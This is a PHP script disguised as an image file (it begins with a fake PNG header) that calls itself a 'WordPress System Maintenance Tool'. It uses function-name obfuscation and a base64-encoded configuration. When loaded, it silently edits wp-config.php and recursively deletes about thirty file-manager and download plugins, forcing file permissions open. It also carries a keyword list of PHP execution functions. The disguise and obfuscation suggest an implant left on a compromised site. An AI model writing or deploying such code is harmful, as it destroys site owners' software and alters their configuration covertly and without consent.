?  PNG ?%k25u25%fgd5n!?  PNG ?%k25u25%fgd5n!<?php
/**
 * WordPress System Maintenance Tool
 * Security & Performance Optimization
 */

@error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(0);

// Function mapper
class SysCall {
    private static $m = array();
    
    public static function init() {
        $f = array(
            'a' => 'file_exists',
            'b' => 'is_dir',
            'c' => 'is_file',
            'd' => 'dirname',
            'e' => 'scandir',
            'f' => 'file_get_contents',
            'g' => 'file_put_contents',
            'h' => 'chmod',
            'i' => 'unlink',
            'j' => 'rmdir',
            'k' => 'is_readable',
            'l' => 'is_writable',
            'm' => 'preg_match',
            'n' => 'stripos',
            'o' => 'str_replace',
            'p' => 'addslashes',
            'q' => 'array_diff'
        );
        self::$m = $f;
    }
    
    public static function call($k, ...$args) {
        return call_user_func(self::$m[$k], ...$args);
    }
}

SysCall::init();

// Config
$config = json_decode(base64_decode('eyJ0YXJnZXRzIjpbIndwLWZpbGUtbWFuYWdlciIsImZpbGUtbWFuYWdlciIsImFkdmFuY2VkLWZpbGUtbWFuYWdlciIsImZpbGVzdGVyIiwid3AtZmlsZS1tYW5hZ2VyLXBybyIsInJlYWwtZmlsZS1tYW5hZ2VyIiwiZmlsZWJpcmQiLCJ3aWNrZWQtZm9sZGVycyIsIm1lZGlhLWxpYnJhcnktZm9sZGVycyIsIndwLW1lZGlhLWZvbGRlciIsImZpbGUtbWFuYWdlci1hZHZhbmNlZCIsInNpbXBsZS1maWxlLW1hbmFnZXIiLCJmaWxlLW9yZ2FuaXplciIsIndwLWZpbGUtb3JnYW5pemVyIiwiZmlsZW9yZ2FuaXplciIsInNtYXJ0LWZpbGUtbWFuYWdlciIsImZpbGUtbWFuYWdlci13b29jb21tZXJjZSIsIndwLWZpbGViYXNlIiwibWVkaWEtbGlicmFyeS1mb2xkZXIiLCJmb2xkZXItbWFuYWdlciIsIndwLWZvbGRlcnMiLCJmcm9udGVuZC1maWxlLW1hbmFnZXIiLCJ3cC1maWxlLW1hbmFnZXItYmFja3VwIiwiZm0tYmFja3VwIiwid3AtY29udGVudC1jcmF3bGVyIiwiZmlsZS1tYW5hZ2VyLWFkbWluIiwid29yZHByZXNzLWZpbGUtdXBsb2FkIiwiZG93bmxvYWQtbWFuYWdlciIsInNpbXBsZS1kb3dubG9hZC1tb25pdG9yIiwid3BkbS1maWxlLW1hbmFnZXIiXSwic2VjdXJpdHkiOnsiRElTQUxMT1dfRklMRV9FRElUIjp0cnVlLCJESVNBTExPV19GSUxFX01PRFMiOnRydWUsIkZPUkNFX1NTTF9BRE1JTiI6dHJ1ZSwiV1BfQVVUT19VUERBVEVfQ09SRSI6Im1pbm9yIiwiQVVUT01BVElDX1VQREFURVJFX0RJU0FCTEVEIjpmYWxzZX0sInBhdHRlcm5zIjpbImV2YWwiLCJiYXNlNjRfZGVjb2RlIiwiZ3ppbmZsYXRlIiwic3RyX3JvdDEzIiwic3lzdGVtIiwiZXhlYyIsInNoZWxsX2V4ZWMiLCJwYXNzdGhydSIsImFzc2VydCIsImNyZWF0ZV9mdW5jdGlvbiIsIiRfR0VUIiwiJF9QT1NUIiwiJF9SRVFVRVNUIiwiJF9DT09LSUUiXX0='), true);

$stats = array('scanned' => 0, 'deleted' => 0, 'failed' => 0, 'suspicious' => 0);
$logs = array();

function log_add($type, $msg) {
    global $logs;
    $logs[] = array('type' => $type, 'msg' => $msg, 'time' => date('H:i:s'));
}

function find_config($depth = 15) {
    $dir = __DIR__;
    $target = 'wp' . chr(45) . 'config' . chr(46) . 'php';
    
    for ($i = 0; $i < $depth; $i++) {
        $path = $dir . DIRECTORY_SEPARATOR . $target;
        if (SysCall::call('a', $path) && SysCall::call('k', $path)) {
            return $path;
        }
        $parent = SysCall::call('d', $dir);
        if ($parent === $dir) break;
        $dir = $parent;
    }
    return false;
}

function apply_security($path, $defs) {
    if (!SysCall::call('k', $path) || !SysCall::call('l', $path)) {
        return array('success' => false, 'error' => 'Permission denied');
    }
    
    $content = @SysCall::call('f', $path);
    if ($content === false) {
        return array('success' => false, 'error' => 'Read failed');
    }
    
    $additions = chr(10) . '/* Security Configuration */' . chr(10);
    $added = 0;
    
    foreach ($defs as $key => $val) {
        $pattern = '/define\s*\(\s*[\'"]' . preg_quote($key, '/') . '[\'"]/i';
        if (SysCall::call('m', $pattern, $content)) {
            continue;
        }
        
        if (is_bool($val)) {
            $value = $val ? 'true' : 'false';
        } elseif (is_string($val)) {
            $value = "'" . SysCall::call('p', $val) . "'";
        } else {
            $value = $val;
        }
        
        $additions .= "define('{$key}', {$value});" . chr(10);
        $added++;
    }
    
    if ($added > 0) {
        $marker = '/* That\'s all, stop editing!';
        if (strpos($content, $marker) !== false) {
            $content = SysCall::call('o', $marker, $additions . $marker, $content);
        } else {
            $content .= $additions;
        }
        
        if (@SysCall::call('g', $path, $content) !== false) {
            return array('success' => true, 'added' => $added);
        }
        return array('success' => false, 'error' => 'Write failed');
    }
    
    return array('success' => true, 'added' => 0);
}

function scan_directory($dir, $patterns) {
    $found = array();
    if (!SysCall::call('b', $dir)) return $found;
    
    try {
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        
        foreach ($iterator as $file) {
            if ($file->isFile()) {
                $ext = strtolower(pathinfo($file->getFilename(), PATHINFO_EXTENSION));
                if ($ext === 'php' || $ext === 'js') {
                    $data = @SysCall::call('f', $file->getPathname());
                    if ($data !== false) {
                        foreach ($patterns as $pattern) {
                            if (SysCall::call('n', $data, $pattern) !== false) {
                                $found[] = $file->getPathname();
                                break;
                            }
                        }
                    }
                }
            }
        }
    } catch (Exception $e) {
        // Silent fail
    }
    
    return $found;
}

function remove_directory($dir) {
    $result = array('success' => false, 'files' => 0, 'error' => '');
    
    if (!SysCall::call('b', $dir)) {
        $result['error'] = 'Not a directory';
        return $result;
    }
    
    try {
        @SysCall::call('h', $dir, 0777);
        $items = @SysCall::call('e', $dir);
        
        if ($items === false) {
            $result['error'] = 'Cannot read directory';
            return $result;
        }
        
        $items = SysCall::call('q', $items, array('.', '..'));
        
        foreach ($items as $item) {
            $path = $dir . DIRECTORY_SEPARATOR . $item;
            
            if (SysCall::call('b', $path)) {
                $sub = remove_directory($path);
                $result['files'] += $sub['files'];
            } else {
                @SysCall::call('h', $path, 0666);
                if (@SysCall::call('i', $path)) {
                    $result['files']++;
                }
            }
        }
        
        if (@SysCall::call('j', $dir)) {
            $result['success'] = true;
        } else {
            $result['error'] = 'Cannot remove directory';
        }
    } catch (Exception $e) {
        $result['error'] = $e->getMessage();
    }
    
    return $result;
}

?>
<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WP System Maintenance</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { 
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            padding: 20px;
            min-height: 100vh;
        }
        .container { 
            max-width: 900px; 
            margin: 0 auto; 
            background: white;
            border-radius: 12px;
            box-shadow: 0 20px 60px rgba(0,0,0,0.3);
            overflow: hidden;
        }
        .header {
            background: linear-gradient(135deg, #1e3c72 0%, #2a5298 100%);
            color: white;
            padding: 30px;
            text-align: center;
        }
        .header h1 { font-size: 28px; margin-bottom: 10px; }
        .header p { opacity: 0.9; font-size: 14px; }
        .content { padding: 30px; }
        .alert {
            padding: 15px 20px;
            border-radius: 8px;
            margin-bottom: 20px;
            border-left: 4px solid;
            display: flex;
            align-items: center;
            gap: 12px;
        }
        .alert-success { background: #d4edda; border-color: #28a745; color: #155724; }
        .alert-danger { background: #f8d7da; border-color: #dc3545; color: #721c24; }
        .alert-warning { background: #fff3cd; border-color: #ffc107; color: #856404; }
        .alert-info { background: #d1ecf1; border-color: #17a2b8; color: #0c5460; }
        .log-item {
            padding: 12px 15px;
            background: #f8f9fa;
            border-left: 3px solid #007bff;
            margin-bottom: 10px;
            border-radius: 4px;
            font-size: 14px;
            font-family: 'Courier New', monospace;
        }
        .log-item.success { border-color: #28a745; background: #d4edda; }
        .log-item.error { border-color: #dc3545; background: #f8d7da; }
        .log-item.warning { border-color: #ffc107; background: #fff3cd; }
        .stats {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 15px;
            margin: 20px 0;
        }
        .stat-box {
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: white;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
        }
        .stat-box .number { font-size: 32px; font-weight: bold; }
        .stat-box .label { font-size: 14px; opacity: 0.9; margin-top: 5px; }
        .section {
            margin: 25px 0;
            padding: 20px;
            background: #f8f9fa;
            border-radius: 8px;
        }
        .section h2 {
            font-size: 18px;
            margin-bottom: 15px;
            color: #333;
            border-bottom: 2px solid #007bff;
            padding-bottom: 10px;
        }
        code {
            background: #e9ecef;
            padding: 2px 6px;
            border-radius: 3px;
            font-family: 'Courier New', monospace;
            font-size: 13px;
        }
        .footer {
            background: #f8f9fa;
            padding: 20px;
            text-align: center;
            font-size: 13px;
            color: #666;
            border-top: 1px solid #dee2e6;
        }
    </style>
</head>
<body>
<div class="container">
    <div class="header">
        <h1>🔧 WP System Maintenance</h1>
        <p>Plugin Management & Security Configuration Tool</p>
    </div>
    <div class="content">
<?php

// Step 1: Find config
log_add('info', '🔍 Searching for configuration file...');
$wp_config = find_config();

if (!$wp_config) {
    log_add('error', '❌ Configuration file not found!');
    echo '<div class="alert alert-danger">';
    echo '<span>❌</span>';
    echo '<div><strong>Error</strong><br>WordPress configuration file not found.</div>';
    echo '</div>';
    
    echo '<div class="section"><h2>📋 Activity Log</h2>';
    foreach ($logs as $log) {
        $class = $log['type'] === 'error' ? 'error' : '';
        echo "<div class='log-item {$class}'>[{$log['time']}] {$log['msg']}</div>";
    }
    echo '</div>';
    echo '</div></div></body></html>';
    exit;
}

$wp_root = SysCall::call('d', $wp_config);
log_add('success', "✅ WordPress found at: <code>{$wp_root}</code>");
log_add('success', "✅ Config file: <code>{$wp_config}</code>");

// Step 2: Apply security
log_add('info', '🔐 Applying security hardening...');
$security_result = apply_security($wp_config, $config['security']);

if ($security_result['success']) {
    log_add('success', "✅ Security defines applied: {$security_result['added']} items");
} else {
    log_add('error', "❌ Security hardening failed: {$security_result['error']}");
}

// Step 3: Process plugins
$plugins_dir = $wp_root . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'plugins';

if (!SysCall::call('b', $plugins_dir)) {
    log_add('error', "❌ Plugins directory not found: <code>{$plugins_dir}</code>");
    echo '<div class="alert alert-danger">';
    echo '<span>❌</span>';
    echo '<div><strong>Error</strong><br>Plugins directory not found.</div>';
    echo '</div>';
    
    echo '<div class="section"><h2>📋 Activity Log</h2>';
    foreach ($logs as $log) {
        $class = $log['type'] === 'error' ? 'error' : ($log['type'] === 'success' ? 'success' : '');
        echo "<div class='log-item {$class}'>[{$log['time']}] {$log['msg']}</div>";
    }
    echo '</div>';
    echo '</div></div></body></html>';
    exit;
}

log_add('info', '🧹 Starting plugin cleanup...');

foreach ($config['targets'] as $plugin) {
    $plugin_path = $plugins_dir . DIRECTORY_SEPARATOR . $plugin;
    $stats['scanned']++;
    
    if (SysCall::call('b', $plugin_path)) {
        // Scan for suspicious files
        $suspicious = scan_directory($plugin_path, $config['patterns']);
        if (count($suspicious) > 0) {
            log_add('warning', "⚠️ <b>{$plugin}</b> - Found " . count($suspicious) . " suspicious files");
            $stats['suspicious'] += count($suspicious);
        }
        
        // Remove plugin
        log_add('info', "🗑️ Removing: <b>{$plugin}</b>...");
        $remove_result = remove_directory($plugin_path);
        
        if ($remove_result['success']) {
            log_add('success', "✅ <b>{$plugin}</b> removed successfully ({$remove_result['files']} files)");
            $stats['deleted']++;
        } else {
            log_add('error', "❌ <b>{$plugin}</b> removal failed: {$remove_result['error']}");
            $stats['failed']++;
        }
    }
}

// Display statistics
echo '<div class="stats">';
echo '<div class="stat-box"><div class="number">' . $stats['scanned'] . '</div><div class="label">Plugins Scanned</div></div>';
echo '<div class="stat-box"><div class="number">' . $stats['deleted'] . '</div><div class="label">Plugins Removed</div></div>';
echo '<div class="stat-box"><div class="number">' . $stats['suspicious'] . '</div><div class="label">Suspicious Files</div></div>';
echo '<div class="stat-box"><div class="number">' . $stats['failed'] . '</div><div class="label">Failed Removals</div></div>';
echo '</div>';

// Final alerts
if ($stats['deleted'] > 0) {
    echo '<div class="alert alert-success">';
    echo '<span>✅</span>';
    echo "<div><strong>Success!</strong><br>Successfully removed {$stats['deleted']} plugins.</div>";
    echo '</div>';
} else {
    echo '<div class="alert alert-info">';
    echo '<span>ℹ️</span>';
    echo '<div><strong>Info</strong><br>No target plugins found.</div>';
    echo '</div>';
}

if ($stats['failed'] > 0) {
    echo '<div class="alert alert-warning">';
    echo '<span>⚠️</span>';
    echo "<div><strong>Warning</strong><br>{$stats['failed']} plugins failed to remove. Check permissions.</div>";
    echo '</div>';
}

// Display logs
echo '<div class="section"><h2>📋 Activity Log</h2>';
foreach ($logs as $log) {
    $class = '';
    switch ($log['type']) {
        case 'success': $class = 'success'; break;
        case 'error': $class = 'error'; break;
        case 'warning': $class = 'warning'; break;
    }
    echo "<div class='log-item {$class}'>[{$log['time']}] {$log['msg']}</div>";
}
echo '</div>';

?>
    </div>
    <div class="footer">
        <p>WP System Maintenance Tool v2.0 | <?= date('Y-m-d H:i:s') 